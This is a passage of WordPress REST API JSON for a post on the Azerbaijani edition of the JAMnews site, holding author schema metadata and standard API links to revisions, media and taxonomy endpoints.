/www.youtube.com\/channel\/UCXQbUCme2pykuZYXWHx4VPg"]},{"@type":"Person","@id":"https:\/\/jam-news.net\/az\/#\/schema\/person\/67df3bb7adb46cd513fb9c4cb02361c6","name":"JAMnews","image":{"@type":"ImageObject","inLanguage":"az","@id":"https:\/\/jam-news.net\/az\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e5c27593ef900c3ab3deed4ed1c653d7?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e5c27593ef900c3ab3deed4ed1c653d7?s=96&d=mm&r=g","caption":"JAMnews"},"url":"https:\/\/jam-news.net\/az\/author\/margarita\/"}]}},"_links":{"self":[{"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/posts\/13134","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/comments?post=13134"}],"version-history":[{"count":1,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/posts\/13134\/revisions"}],"predecessor-version":[{"id":16613,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/posts\/13134\/revisions\/16613"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/media\/22947"}],"wp:attachment":[{"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/media?parent=13134"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/categories?post=13134"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/tags?post=13134"},{"taxonomy":"formation","embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/formation?post=13134"},{"taxonomy":"post-author","embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/post-author?post=13134"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/topic?post=13134"},{"taxonomy":"tooltip","embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/tooltip?post=13134"},{"taxonomy":"city","embeddable":true,"href":"https:\/\/jam-news.net\/az\/wp-json\/wp\/v2\/city?post=13134"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}